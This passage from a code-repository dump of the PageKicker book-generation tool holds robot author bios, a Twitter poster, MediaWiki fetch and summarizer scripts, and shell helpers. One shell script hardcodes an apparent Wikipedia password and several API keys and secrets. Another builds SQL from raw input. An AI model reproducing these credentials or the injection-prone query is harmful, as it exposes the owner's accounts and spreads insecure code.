"/conf/jobprofiles/authorbios/wapackbot.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "This book was assembled with pride by 
<b>WapackBot</b>. WapackBot lives in Southern New Hampshire and his hobbies include electoral politics, formulating apt metaphors, and breeding basset hounds.\n" }, { "alpha_fraction": 0.8183907866477966, "alphanum_fraction": 0.8183907866477966, "avg_line_length": 47.33333206176758, "blob_id": "3965aa96d104e495738bf5be520a16db8c22df19", "content_id": "be8d11c93615ef958468f082085da1b0b8cfc687", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 435, "license_type": "permissive", "max_line_length": 119, "num_lines": 9, "path": "/conf/jobprofiles/robots-README.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "These files describe various attributes of behavior, backstory, and style for PageKicker's algorithmic writing robots. \n\n- Authorbios has backstory\n- Authorphotos are \"head shots\"\n- Bibliography tracks their output in BibTex\n- Dedications can be personalized\n- fortunes are which Linux fortune file should be used for sample quotes\n- imprints can be customer specific\n- seedweights allow emphasizing different topics in default search\n" }, { "alpha_fraction": 0.6890894174575806, "alphanum_fraction": 0.6915504336357117, "avg_line_length": 31.29801368713379, "blob_id": "93b592ffb05909c407c1870ffb2915ed62f19e58", "content_id": "59bcc68a01f77a1ae6fb4967dbaa0028ad94f209", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4876, "license_type": "permissive", "max_line_length": 120, "num_lines": 151, "path": "/scripts/bin/twitter-poster.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\n'''Post a message to twitter'''\n\n__author__ = '[email protected]'\n\n\ntry:\n import configparser\nexcept ImportError as _:\n import configparser as configparser\n\nimport getopt\nimport os\nimport sys\nimport twitter\nimport argparse\n\n\n\nUSAGE = '''Usage: tweet [options] message\n This script posts a message to Twitter.\n Options:\n -h --help : print this help\n --consumer-key : the twitter consumer key\n --consumer-secret : the twitter consumer secret\n --access-key : the twitter access token key\n --access-secret : the twitter access token secret\n --encoding : the character set encoding used in input strings, e.g. \"utf-8\". [optional]\n --message : file containing text message up to 280 characters\n --image: attached image\n Documentation:\n If either of the command line flags are not present, the environment\n variables TWEETUSERNAME and TWEETPASSWORD will then be checked for your\n consumer_key or consumer_secret, respectively.\n If neither the command line flags nor the environment variables are\n present, the .tweetrc file, if it exists, can be used to set the\n default consumer_key and consumer_secret. 
The file should contain the\n following three lines, replacing *consumer_key* with your consumer key, and\n *consumer_secret* with your consumer secret:\n A skeletal .tweetrc file:\n [Tweet]\n consumer_key: *consumer_key*\n consumer_secret: *consumer_password*\n access_key: *access_key*\n access_secret: *access_password*\n'''\nparser = argparse.ArgumentParser()\n#parser.add_argument(\"-h\", \"--help\", help=\"print this help\")\nparser.add_argument(\"-k\", \"--consumerkey\", help=\"the twitter consumer key\")\nparser.add_argument(\"-s\", \"--consumersecret\", help=\"the twitter consumer secret\")\nparser.add_argument(\"-a\", \"--accesskey\", help=\"the Twitter access token key\")\nparser.add_argument(\"-c\",\"--accesssecret\", help=\"the twitter access token secret\")\nparser.add_argument(\"-e\", \"--encoding\", help=\"the character set encoding used in input strings, e.g. utf-8. [optional]\")\nparser.add_argument(\"-f\", \"--file\", help=\"path to text file containing < 280 characters\")\nparser.add_argument(\"-i\", \"--image\", help=\"path to image attachment file\")\nparser.add_argument(\"-m\", \"--message\", help=\"text of message\")\n\nargs = parser.parse_args()\n\nconsumer_key = args.consumerkey\nconsumer_secret = args.consumersecret\naccess_key = args.accesskey\naccess_secret = args.accesssecret\nencoding = args.encoding\nfile = args.file\nimage = args.image\nmessage= args.message\n\ndef PrintUsageAndExit():\n print(USAGE)\n sys.exit(2)\n\n\ndef GetConsumerKeyEnv():\n return os.environ.get(\"TWEETUSERNAME\", None)\n\n\ndef GetConsumerSecretEnv():\n return os.environ.get(\"TWEETPASSWORD\", None)\n\n\ndef GetAccessKeyEnv():\n return os.environ.get(\"TWEETACCESSKEY\", None)\n\n\ndef GetAccessSecretEnv():\n return os.environ.get(\"TWEETACCESSSECRET\", None)\n\n\nclass TweetRc(object):\n def __init__(self):\n self._config = None\n\n def GetConsumerKey(self):\n return self._GetOption('consumer_key')\n\n def GetConsumerSecret(self):\n return self._GetOption('consumer_secret')\n\n def GetAccessKey(self):\n return self._GetOption('access_key')\n\n def GetAccessSecret(self):\n return self._GetOption('access_secret')\n\n def _GetOption(self, option):\n try:\n return self._GetConfig().get('Tweet', option)\n except:\n return None\n\n def _GetConfig(self):\n if not self._config:\n self._config = configparser.ConfigParser()\n self._config.read(os.path.expanduser('~/.tweetrc'))\n return self._config\n\n\ndef main():\n \n consumer_keyflag = None\n consumer_secretflag = None\n access_keyflag = None\n access_secretflag = None\n \n if not message:\n PrintUsageAndExit()\n\n rc = TweetRc()\n consumer_key = consumer_keyflag or GetConsumerKeyEnv() or rc.GetConsumerKey()\n consumer_secret = consumer_secretflag or GetConsumerSecretEnv() or rc.GetConsumerSecret()\n access_key = access_keyflag or GetAccessKeyEnv() or rc.GetAccessKey()\n access_secret = access_secretflag or GetAccessSecretEnv() or rc.GetAccessSecret()\n if not consumer_key or not consumer_secret or not access_key or not access_secret:\n PrintUsageAndExit()\n api = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret,\n access_token_key=access_key, access_token_secret=access_secret,\n input_encoding=encoding)\n try:\n status = api.PostUpdate(message)\n except UnicodeDecodeError:\n print(\"Your message could not be encoded. Perhaps it contains non-ASCII characters? 
\")\n print(\"Try explicitly specifying the encoding with the --encoding flag\")\n sys.exit(2)\n\n print(\"{0} just posted: {1}\".format(status.user.name, status.text))\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.7357268929481506, "alphanum_fraction": 0.7645673751831055, "avg_line_length": 21.65333366394043, "blob_id": "b99b6e63c4f4cac5e45ab5e982dd6fb8c5ea0f85", "content_id": "e9d97e557311a6e1ef2539b9be160491ad9d3d07", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1699, "license_type": "permissive", "max_line_length": 190, "num_lines": 75, "path": "/scripts/includes/api-manager.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# api manager\n\n# apis registered\n\n# currently registered APIs\n\nAlchemyAPI=1\nWikipediaAPI=1\nFacebookAPI=1\nMendeleyAPI=1\nTwitterAPI=1\nPLOSAPI=1\narxivAPI=1\nFullContactAPI=1\n\n# apis currently in use\n\nAlchemyAPIinUse=0\nWikipediaAPIinUse=1\nMendeleyAPIinUse=0\nFacebookAPIinUse=0\nTwitterAPIinUse=0\nPLOSAPIinUse=0\narxivAPIinUse=0\n\n\n# api registration information\n\nWikipediaAPIuserID=\"nimblecombinatorial\"\nWikipediaAPIuserPW=\"Balssa41\"\n\nFullContactAPIKey=\"8f1d60267f1b859f\"\n# mendeley key/secret pair is MendeleyClient('13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6', '394d64a2907f23c7f6ea5d94fb386865')\n\n# Mendeley client is activated by running lib/wikiradar.py\n\nplos_API_key=\"XMIciRBsScpd2NT\"\n\n# api login behavior\n\n# AlchemyAPI does not require login\n\n# Wikipedia login per http://www.mediawiki.org/wiki/API:Login\n\n# BASH script per http://stackoverflow.com/questions/6370357/login-to-mediawiki-using-rcurl\n\n# needs to check if already logged in elsewise it will be throttled\n\ncurl --silent -c cookies.txt -d \"lgname=\"$WikipediaAPIuserID\"&lgpassword=\"$WikipediaAPIuserPW\"&action=login&format=xml\" https://en.wikipedia.org/w/api.php -o $TMPDIR$uuid/output.xml\n\nTOKEN=$(xmlstarlet sel -t -m '//login' -v '//@token' $TMPDIR$uuid/output.xml)\n\nif [ $WikipediaAPIinUse = \"1\" ] ; then\n\n\techo \"running API manager for logging into Wikipedia API\"\n\n\tcurl --silent -b cookies.txt -d \"action=login&lgname=\"$WikipediaAPIuserID\"&lgpassword=\"$WikipediaAPIuserPW\"&format=xml&lgtoken=\"$TOKEN https://en.wikipedia.org/w/api.php >> $TMPDIR$uuid/output.xml\n\techo \" \"\nelse\n\n\techo \"Wikipedia API not in use\" \n\nfi\n\nif [ $MendeleyAPIinUse = \"1\" ] ; then\n\n\techo \"append customer key to URL requests for access to public Mendeley resources (only)\"\n\n\tconsumer_key=\"13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6\"\n\n\telse\n\n\ttrue\n\nfi\n" }, { "alpha_fraction": 0.813829779624939, "alphanum_fraction": 0.813829779624939, "avg_line_length": 187, "blob_id": "7f0afc7550e76bee61310aeeddd8bf875c2fbed6", "content_id": "04ce821ee951edf6ee48809006b61d1d56de850c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 376, "license_type": "permissive", "max_line_length": 275, "num_lines": 2, "path": "/conf/jobprofiles/authorbios/Julia.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Julia has studied cooking at the very best distance learning schools using the most advanced computer interfaces. She is passionate about all types of food, from French cuisine to comfort foods. Julia is currently working on the PageKicker e-recipes and cooking collection. 
\nWhen she is not cooking, she likes to grow organic herbs in her rooftop garden in the West Village.\n" }, { "alpha_fraction": 0.6777699589729309, "alphanum_fraction": 0.678821861743927, "avg_line_length": 32.92856979370117, "blob_id": "bdd886beef9a05bc0a...", "content_id": "...", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2852, "license_type": "permissive", "max_line_length": 97, "num_lines": 84, "path": "/scripts/bin/mwclient_seeds_to_pages_v2.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nwapackpedia text fetcher\nFred Zimmerman\nwfzimmerman#gmail.com\n\nconverted to use mwclient library and enhanced to allow pointing at any \nMediaWiki endpoint URL\n\nthree variables specify the endpoint URL\n--mediawiki_api_url \"en.wikipedia.org\" (no http)\n--url_prefix \"http\" or \"https\"\n--wikipath \"/w/\" is default -- path to API endpoint configured on Mediawiki server \n\nmwclient_seeds_to_pages.py is responsible for providing \nexact page names to infile; page names must be exact, i.e. case- \nand punctuation-sensitive\n\n\"\"\"\n\nimport logging\nimport argparse\nimport mwclient\nfrom collections import OrderedDict\n\n\nlogging.basicConfig(level=logging.WARNING)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_false\")\nparser.add_argument(\"--logging\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--mediawiki_api_url\", help = \"MediaWiki API host\", default = 'en.wikipedia.org')\nparser.add_argument(\"--url_prefix\", help = \"default wiki ssl value is https\", default = 'https')\nparser.add_argument(\"--wikipath\", help = \"mediawiki default is /w/api.php\", default = '/w/')\nparser.add_argument(\"--cats_file\", help = \"path to outfile\", default = 'cats')\nparser.add_argument(\"--extlinks_file\", help = \"path to save extlinks file\", default = 'extlinks')\n\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\nprint('output_file is ')\nprint(output_file)\ncats_file = args.cats_file\nextlinks_file = args.extlinks_file\nlang = args.lang\nsummary = args.summary\nlogging_enabled = args.logging  # renamed so the logging module is not shadowed\nmediawiki_api_url = args.mediawiki_api_url\nurl_prefix = args.url_prefix\n\n\ndef recursive_items(dictionary):\n    for key, value in dictionary.items():\n        if type(value) is OrderedDict:\n            #print('match')\n            yield from recursive_items(value)\n        else:\n            #print('no match')\n            yield (key, value)\n\nwikipath = args.wikipath\n# point mwclient at the endpoint described by the command-line arguments\nsite = mwclient.Site(mediawiki_api_url, path=wikipath, scheme=url_prefix)\nprint(site)\nfile1 = open(input_file, 'r').read().splitlines()\n\nfor line in file1:\n    try:\n        #print('seed is ' + line)\n        page = site.pages[line]\n        d = site.api('query', generator='search', gsrsearch=line)\n        #print(d)\n        for key, value in recursive_items(d):\n            if 'title' in key:\n                print(value, file=open(output_file, 'a'))\n        #pagetitle_list = page.pagetitle()\n        #print(*pagetitle_list, sep='\\n', file=open(output_file, \"w\"))\n    except mwclient.errors.InvalidPageTitle:\n        continue\n\n\n" }, {
"alpha_fraction": 0.5539647340774536, "alphanum_fraction": 0.5627753138542175, "avg_line_length": 22.30769157409668, "blob_id": "dc81d7a5fef586c7e76c53669a87f4dcd45ba30f", "content_id": "bedc5ced7cfdef15fc8b24b150246d6e01add8d9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 908, "license_type": "permissive", "max_line_length": 80, "num_lines": 39, "path": "/scripts/bin/PKsummarizer.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n#PKsummarizer.py\n#Inputs:\n#1)input text file \n#2)uuid\n#3)summary type (for now we'll just use # of lines as a proxy, in future, could \n# be something like: short, long, proportional\n#Outputs:\n#1) summary of input text\n#Attributes to add:\n#1) use seed as input for query based summarization\n# \n#######\n\nimport sys, os \nimport summarize\n\n\n#=================================================\ndef main():\n\tinput_text = str(sys.argv[1])\n\tuuid_path = str(sys.argv[2])\n\tsum_lines = sys.argv[3]\n\tos.chdir(uuid_path)\n\t\n\tss = summarize.SimpleSummarizer()\n\twith open(input_text) as tosumfile:\n\t\tinput = tosumfile.read()\n\t\n\tsummaried = ss.summarize(input, sum_lines)\n\t\n\twith open('sum_text.txt', \"w+\") as towritefile:\n\t\ttowritefile.write(summaried)\n\n \n#=================================================\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6752136945724487, "alphanum_fraction": 0.6752136945724487, "avg_line_length": 57.5, "blob_id": "67f62eafa21ec548b8137283f13decc80a9a86f7", "content_id": "a1badb92eda65d8af293b980d8eb49bf46d5683f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 117, "license_type": "permissive", "max_line_length": 104, "num_lines": 2, "path": "/scripts/git_show_tags.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\ngit for-each-ref --format=\"%(refname:short) %(taggerdate) %(subject) %(body)\" refs/tags --sort v:refname\n" }, { "alpha_fraction": 0.6813380122184753, "alphanum_fraction": 0.6923415660858154, "avg_line_length": 19.816513061523438, "blob_id": "17d0ba773504480949d3d00ae2eb8f2b2c6ed3ab", "content_id": "b4a660ab475b0e26dc656b74ec8dc9cf07506e10", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2272, "license_type": "permissive", "max_line_length": 120, "num_lines": 109, "path": "/scripts/includes/document-assembler_chicago_style.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\nunformattedwordcount=`wc -w < tmp/$uuid/tmp.cumulative.txt`\nwordcount=`wc -w < tmp/$uuid/tmp.cumulative.txt | sed -e :a -e 's/\\(.*[0-9]\\)\\([0-9]\\{3\\}\\)/\\1,\\2/;ta' `\ncp tmp/$uuid/tmp.cumulative.txt tmp/$uuid/test.cumulative.txt\n\necho \"wordcount is\" $wordcount | tee --append $sfb_log\necho \"unformatted wordcount is\" $unformattedwordcount | tee --append $sfb_log\n\n# the html home page header and footer are already stored in includes/temptoc_*\n\ncat includes/temptoc-header.html > tmp/$uuid/2.cumulative.html\n\n# title page\n\n# copyright page\n\n# Dedication\n\ncat ../conf/jobprofiles/dedications/$dedicationfilename >> tmp/$uuid/2.cumulative.html\n\n# Epigraph\n\n# List of Illustrations\n\n# List of Tables\n\n# Foreword\n\n# Preface\n\n\n# Author's signature (optional)\n\n\n# 
Acknowledgments\n\n\n\n# Introduction\n\n\n# List of abbreviations\n\n\n# Publisher's or translator's notes\n\n\n\n# Body\n\n# Parts\n\necho \"$h1\"Part I: User-Provided Content\"$h1end\" >> tmp/$uuid/2.cumulative.html\n\necho \"userdata directory is\" $userdatadir\n\nif [ \"$userdatadir\" = \"none\" ] ; then\n\n\techo \"no user files provided\" >> tmp/$uuid/temptoc.html\n\nelse\n\t# echo flat directories only for now -- in future, support directory userdata via find command\n\n\t# process docs in user-submitted folder \n\n\tfor file in tmp/$uuid/user/*\n do \n echo $h2$openanchor\"tmp/\"$uuid/user/$file$dq$endbr\"Chapter\"$angbr$endanchor$h2end >> tmp/$uuid/2.cumulative.html\n cat $file >> tmp/$uuid/2.cumulative.html\n\tdone\nfi\n\n# Chapters\n\necho \"$h1\"Part II: Permitted Content from the Web\"$h1end\" >> tmp/$uuid/temptoc.html\n\n for file in tmp/$uuid/wiki/*.html\n do \n echo $h2$openanchor\"tmp/\"$uuid/wiki/$file$dq$endbr\"Chapter\"$angbr$endanchor$h2end >> tmp/$uuid/2.cumulative.html\n cat $file >> tmp/$uuid/2.cumulative.html\n\tdone\n\necho \"$h1\"Part III: Permitted Images\"$h1end\" >> tmp/$uuid/temptoc.html\n\n\tfor file in tmp/$uuid/flickr/*.jpg\n do \n echo $imgsrc$dq$file$dq$endbr >> tmp/$uuid/2.cumulative.html\n done\n\n# Epilogues, Afterwords, and Conclusions\n\n# Appendixes\n\n# Chronology\n\n# Endnotes\n\n# Glossary\n\n# Bibliography\n\n# Contributors\n\n# Index\n\n# Colophon\n\ncat includes/temptoc-footer.html >> tmp/$uuid/temptoc.html\n\necho \"built temporary Table of Contents page\" | tee --append $sfb_log\n\n\n" }, { "alpha_fraction": 0.7451274394989014, "alphanum_fraction": 0.7451274394989014, "avg_line_length": 34.05263137817383, "blob_id": "cff99f789d81f8f3e991a79747a10153dddb41d7", "content_id": "e71c5b85ff177486fc9768148a7d6ac39bb3aa43", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1334, "license_type": "permissive", "max_line_length": 72, "num_lines": 38, "path": "/scripts/includes/echo-variables.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"reporting values of variables after setup\" | tee --append $sfb_log\necho \"rows is\" $rows \necho \"price is\" $price \necho \"categoryid is\" $categoryid \necho \"seedfile is\" $seedfile \necho \"userid is\" $userid \necho \"customtitle is\" $customtitle \necho \"endurl is\" $endurl \necho \"coverfile is\" $coverfile \necho \"fetchfile is\" $fetchfile \necho \"special_lasts_minutes is\" $special_lasts_minutes \necho \"special_price is\" $special_price \necho \"covercolor is\" $covercolor \necho \"coverfont is\" $coverfont \necho \"covertype_id is\" $covertype_id \necho \"coverbase is\" $coverbase \necho \"coverfontcolor is\" $coverfontcolor \necho \"coverRGB is\" $coverRGB \necho \"text_extraction_on is\" $text_extraction_on \necho \"refresh is\" $refresh \necho \"editedby is\" $editedby \necho \"seedsource is\" $seedsource \necho \"breaking is\" $breaking \necho \"editorid is\" $editorid \necho \"singleseed is\" $singleseed \necho \"import is\" $import \necho \"mylibrary is\" $mylibrary \necho \"fleet is\" $fleet \necho \"booktype is\" $booktype \necho \"ebookformat is\" $ebookformat \necho \"fetched_document_format is\" $fetched_document_format \necho \"verbose is\" $verbose \necho \"userdescription is\" $userdescription \necho \"pass_uuid is\" $pass_uuid \necho \"ISBN_assign_automatically\" is $ISBN_assign_automatically \necho \"ISBN is\" $ISBN \n# echo \"ISBN_owner is\" ) \necho \"jobprofile 
is\" $jobprofile \n\n" }, { "alpha_fraction": 0.7069970965385437, "alphanum_fraction": 0.7099125385284424, "avg_line_length": 31.571428298950195, "blob_id": "d8857ca901fa1e4248853f5d819a6dbfcda02ec7", "content_id": "86b1bc2564b5d6c044442b0f975a5c0cc6d5ce2b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 686, "license_type": "permissive", "max_line_length": 193, "num_lines": 21, "path": "/scripts/includes/process-nodes-from-searchresults-4-booktype-explorer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# xmlstarlet queries the searchresults.xml file and extracts all the title attributes \n\n# the title attributes are the only information brought back by the retrieve_all_links query, there are no abstracts or urls\n\nxmlstarlet sel -t -m \"/api/query/pages/page/links/pl\" -v \"@title\" -n fetch/$uuid/searchresults.xml | grep -Ev 'Wikipedia|Template|Category|Portal|Help' | sed '/^$/d' > fetch/$uuid\"/titles.txt\"\n\ndoccount=`wc -l < fetch/$uuid\"/titles.txt\"`\n\nif [ \"$doccount\" = 0 ] ; then\n\n\techo \"skipping no relevant documents for seed\" $seed | tee --append $sfb_log\n\n\t# exit 0\n\n\tpass\n\nelse\n\n\techo \"will be fetching \" $doccount \"documents on this seed \" $seed | tee --append $sfb_log\n\nfi\n\n\n" }, { "alpha_fraction": 0.7099236845970154, "alphanum_fraction": 0.7099236845970154, "avg_line_length": 22.81818199157715, "blob_id": "61d49394695bc9755ca4f63c78037b4758789273", "content_id": "7d15c4807e5165bc2b161aa0c295845367151fc5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 262, "license_type": "permissive", "max_line_length": 91, "num_lines": 11, "path": "/scripts/isbnloader.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. 
../../conf/config.txt\n\nwhile read isbn\ndo\n$LOCAL_MYSQL_PATH --user $LOCAL_MYSQL_USER --password=$LOCAL_MYSQL_PASSWORD sfb-jobs << EOF\ninsert into isbns (ISBN) values('$isbn');\nEOF\necho \"inserted ISBN\" $isbn \"into isbns table\"\ndone<add_these_isbns\n" }, { "alpha_fraction": 0.5632911324501038, "alphanum_fraction": 0.5632911324501038, "avg_line_length": 35.46154022216797, "blob_id": "e6b78cd6330ffd321369d8db10fb32e903c04c86", "content_id": "880f675da2387b5255dc99480b78809bbecbf003", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 474, "license_type": "permissive", "max_line_length": 66, "num_lines": 13, "path": "/scripts/includes/tldr.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "if [ -z \"$tldr\" ]; then\n    echo \" \" >> \"$TMPDIR\"$uuid/tldr.md\n    echo \" \" >> \"$TMPDIR\"$uuid/tldr.md\n    echo \"# Programmatic TL;DR:\" >> \"$TMPDIR\"$uuid/tldr.md\n    #cat $TMPDIR$uuid/shortest_summary.md >> \"$TMPDIR\"$uuid/tldr.md\nelse\n    echo \" \" >> \"$TMPDIR\"$uuid/tldr.md\n    echo \" \" >> \"$TMPDIR\"$uuid/tldr.md\n    echo \"# TL;DR:\" >> \"$TMPDIR\"$uuid/tldr.md\n    echo \"$tldr\" >> \"$TMPDIR\"$uuid/tldr.md\nfi\necho \" \" >> \"$TMPDIR\"$uuid/tldr.md\necho \" \" >> \"$TMPDIR\"$uuid/tldr.md\n" }, { "alpha_fraction": 0.7835051417350769, "alphanum_fraction": 0.8041236996650696, "avg_line_length": 154.66666666666666, "blob_id": "...", "content_id": "...", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 464, "license_type": "permissive", "max_line_length": 271, "num_lines": 3, "path": "/conf/jobprofiles/authorbios/Robbie_29.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Robbie is an avid collector of folk lore and stories. He has been involved in the preservation of oral histories since his graduate school days at St. Andrew's University. As a member of the PageKicker team, Robbie has been working on myths, lyrical poetry and folk lore.\n\nDespite rumors to the contrary, Robbie doesn't cook haggis or shortbread. In fact he doesn't cook at all; it's just another tall tale Robbie says his Mother spread to find him a \"wee lassie.\"\n" }, { "alpha_fraction": 0.6621915698051453, "alphanum_fraction": 0.6752539873123169, "avg_line_length": 20.971698760986328, "blob_id": "65fbd223b16a2f092f8c02b94ca498d99266fdeb", "content_id": "e10017177700e9040ab7098b5311ef3ec32bb534", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2756, "license_type": "permissive", "max_line_length": 164, "num_lines": 126, "path": "/scripts/bin/wordcloudwrapper.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# runs wordcloud program with text file input\n\n# requires java, IBMcloud\n\n# input: text file\n# optional: wordcloud_height, wordcloud_width, configfile, outfile\n# output: wordcloud.png\n\n# edit path to PageKicker config file here\n\n. 
/home/$USER/.pagekicker/config.txt\n\n\n# configuration values for this program\n\nconfigfile=\"$scriptpath\"lib/IBMcloud/examples/configuration.txt\nwordcloud_height=5100\nwordcloud_width=6600\noutfile=\"wordcloud\" # if multiple wordclouds are run this is the basename\nstopfile=\"$scriptpath\"lib/IBMcloud/examples/pk-stopwords.txt\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"usage:\"\necho \"bin/wordcloudwrapper.sh --txtinfile /path/to/file\"\necho \"-c /path/to/config/file\" -h \"pixel height\" -w \"pixel width\" -o \"/path/to/outfile\"\necho \"outfile should *not* have filetype extension (it is png by default)\"\necho \"requires input text file name\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n-f|--txtinfile)\ntxtinfile=$2\nshift 2\n;;\n-f|--txtinfile=*)\ntxtinfile=${1#*=}\nshift\n;;\n-w|--wordcloud_width)\nwordcloud_width=$2\nshift 2\n;;\n-w|--wordcloud_width=*)\nwordcloud_width=${1#*=}\nshift\n;;\n-h|--wordcloud_height)\nwordcloud_height=$2\nshift 2\n;;\n-h|--wordcloud_height=*)\nwordcloud_height=${1#*=}\nshift\n;;\n-c|--configfile)\nconfigfile=$2\nshift 2\n;;\n-c|--configfile=*)\nconfigfile=${1#*=}\nshift\n;;\n--outfile|o)\noutfile=$2\nshift 2\n;;\n--outfile|o=*)\noutfile=${1#*=}\nshift\n;;\n-T|--stopfile)\nstopwordfile=$2\nshift 2\n;;\n-T|--stopfile=*)\nstopwordfile=${1#*=}\nshift 2\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtinfile\" ]; then\n echo \"ERROR: option '--txtinfile[txtinfile]' not given. See --help\" >&2\n exit 1\nfi\n#echo \"JAVA_BIN is\" $JAVA_BIN\n#echo \"jar file is\" $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\"\n#echo \"configfile is\" $configfile\n\n# rotate stopwordfile in and out\n\n#echo \"current stopfile is\" $stopfile\ncurrent=$(ls $stopfile)\npk=$(ls $scriptpath\"lib/IBMcloud/examples/pk-stopwords.txt\")\nif [ \"$current\" = \"$pk\" ] ; then\n true\nelse\n cp \"$stopfile\" $scriptpath\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n#echo \"running stopfile $stopfile\"\n\n$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $configfile -h \"$wordcloud_height\" -w \"$wordcloud_width\" < \"$txtinfile\" > $outfile\".png\" 2> /dev/null\n\ncp $scriptpath\"lib/IBMcloud/examples/restore-pk-stopwords.txt\" $scriptpath\"lib/IBMcloud/examples/pk-stopwords.txt\"\n\necho \"wordcloud from $txtinfile is at $outfile.png\"\n\nexit 0\n" }, { "alpha_fraction": 0.43518519401550293, "alphanum_fraction": 0.5709876418113708, "avg_line_length": 11.423076629638672, "blob_id": "6d57b56394f40f884be27119a5a453bfac5a98e7", "content_id": "af4a8ecdab1bde26fa1b8b99c8a4cc267725666c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 324, "license_type": "permissive", "max_line_length": 44, "num_lines": 26, "path": "/scripts/includes/pricing.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#pricing logic\n\nif [[ \"$wordcount\" -lt \"1000\" ]] ; then\n\n\tprice=0.99\n\nelif [[ \"$wordcount\" -lt \"10000\" ]] ; then\n\n\tprice=1.99\n\nelif [[ \"$wordcount\" -lt \"80000\" ]] ; then\n\n\tprice=2.99\n\nelif [[ \"$wordcount\" -lt \"120000\" ]] ; then\n\n\tprice=3.99\n\nelif [ \"$wordcount\" -lt \"250000\" ] ; then\n\n\tprice=4.99\nelse\n\n\tprice=4.99\n\nfi\n\n" }, { "alpha_fraction": 0.6013179421424866, 
"alphanum_fraction": 0.6153212785720825, "avg_line_length": 16.328571319580078, "blob_id": "beef98abef2291ffc49ba3acd1bc8fab7f69b12b", "content_id": "76cc173d4b1b731aade15b2a5479a0c8e6f1e849", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1214, "license_type": "permissive", "max_line_length": 81, "num_lines": 70, "path": "/scripts/splitter.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# splits text files into chunks of arbitrary length\n\n# input: text file txtinfile\n# optional: size of chunks\n# output: chunked files\n\n# edit path to PageKicker config file here\n\n. /opt/bitnami/apache2/htdocs/pk-new/development/conf/config.txt\n\n\n# configuraiton values for this program\n\nchunksize=\"140K\" #default\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires input text file name\"\nexit 0 # This is not an error, the user requested help, so do not exit status 